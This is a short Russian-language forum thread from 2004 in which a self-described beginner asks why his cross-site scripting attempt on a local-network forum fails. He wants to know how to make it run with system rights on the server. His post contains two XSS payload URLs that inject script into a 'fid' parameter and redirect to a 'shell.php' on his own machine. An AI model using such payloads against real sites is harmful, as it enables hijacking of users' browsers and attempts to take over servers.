Форумы Межсайтовый вызов скрипта

Discussion in 'Уязвимости CMS/форумов' started by ProTeuS, 26 Nov 2004.

  1. ProTeuS

    ProTeuS --

    Joined:
    26 Nov 2004
    Messages:
    1,239
    Likes Received:
    542
    Reputations:
    445
    Хай, пиплс!
    Помогите нубу разобраться...

    Пытаюсь удаленно обращаться с форума в локалке на скрипт на своей та4ке и хз 4е не выходит =(


    http://10.8.1.207/showforum.php?fid="><script>location.href="http://10.8.1.119/shell.php"</script>
    или
    http://10.8.1.207/showforum.php?fid="><script>window.open("http://10.8.1.119/shell.php")</script>

    Может я в 4ем-то не врубаюсь, но этот код выполняется с правами клиента в моем браузере, а как замутить, 4тобы он исполнялся с правами системы на машине форума???
     
  2. Algol

    Algol New Member

    Joined:
    29 May 2002
    Messages:
    1,759
    Likes Received:
    4
    Reputations:
    0
     
  3. ProTeuS

    ProTeuS --

    Joined:
    26 Nov 2004
    Messages:
    1,239
    Likes Received:
    542
    Reputations:
    445